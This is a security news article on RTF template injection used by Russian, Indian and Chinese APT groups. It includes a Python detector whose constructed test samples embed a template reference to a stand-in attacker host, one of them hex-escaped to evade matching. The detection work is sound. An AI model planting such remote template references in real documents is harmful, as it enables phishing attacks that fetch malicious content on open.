State-sponsored hacker outfits are increasingly employing the new RTF Template Injection attack method. Because the technique leaves fewer obvious indicators in the attachment itself, attacks that use it are getting more difficult to identify and block.
The RTF Template Injection attack method is a novel variant of the classic template injection attack. The method abuses a Microsoft Office feature that allows a document to be generated from a specified template. By placing a template reference in an RTF file, attackers can have the document retrieve malicious content from a remote URL when it is opened. RTF template injection is well suited to malicious phishing attachments, and it is commonly used in the threat landscape because of its simplicity and efficacy compared with other template injection tactics for phishing attachments.
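A defender-side check for the mechanism described above, added here as an example and not taken from the original article or from Proofpoint's report: it extracts the RTF `\*\template` destination, decodes RTF hex escapes (`\'xx`) before matching, and flags any destination that resolves to a URL or UNC path rather than a local file. The RTF fragments and the domain `attacker.example` are constructed test data.

```python
import re

# Constructed sample RTF fragments for testing the detector (not real malware).
REMOTE_TEMPLATE_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template http://attacker.example/template.dotm}"
    rb"\pard Quarterly report attached.\par}"
)
LOCAL_TEMPLATE_RTF = (
    rb"{\rtf1\ansi\deff0"
    rb"{\*\template C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm}"
    rb"\pard Hello.\par}"
)
# Same remote reference, but with "http" written as RTF hex escapes (\'xx).
# Any RTF scanner must normalise these before matching, or it misses the URL.
HEX_ESCAPED_RTF = (
    rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://attacker.example/t.dotm}\par}"
)

# {\*\template <destination>} : the RTF destination group naming the template file.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^{}]*)\}", re.IGNORECASE)
# \'xx : RTF hex escape for a single byte.
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# A destination that is a URL or a UNC path (\\server\share) is fetched remotely.
REMOTE_RE = re.compile(rb"^(?:https?|ftp|file)://|^\\\\", re.IGNORECASE)


def decode_rtf_escapes(data: bytes) -> bytes:
    """Replace each \\'xx hex escape with the byte it encodes."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def find_template_refs(rtf: bytes) -> list[str]:
    """Return every template destination in the RTF, with hex escapes decoded."""
    refs = []
    for m in TEMPLATE_RE.finditer(rtf):
        target = decode_rtf_escapes(m.group(1)).strip()
        refs.append(target.decode("latin-1"))
    return refs


def is_remote_template_injection(rtf: bytes) -> bool:
    """True if any template destination points at a URL or UNC path."""
    return any(REMOTE_RE.search(ref.encode("latin-1"))
               for ref in find_template_refs(rtf))
```

A local template path such as `Normal.dotm` is legitimate and is not flagged; only destinations that would cause an outbound fetch on open are reported.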
According to a recent investigation, APT organisations from Russia, India, and China are using the RTF Template Injection approach, and a number of financially motivated threat actors have adopted it as well. Proofpoint researchers uncovered three state-sponsored entities utilising the technique: Gamaredon (Russia), DoNoT (India), and TA423 (China). DoNoT and TA423 were the first to employ it, using RTF documents that included malicious templates. DoNoT's RTF Template Injection attacks began in March and lasted until July, while TA423 attacks were discovered in September, targeting Malaysian energy businesses. Gamaredon, the Russian FSB intelligence organisation, is the most recent APT actor to employ this tactic: in October it used RTF files while impersonating a government agency.
According to analysts, the efficacy of template injection attacks may lead to their continued use by APT organisations, and botnet and ransomware groups may adopt the strategy in the future. To reduce exposure, enterprises should employ network and host intrusion prevention systems and dependable anti-malware.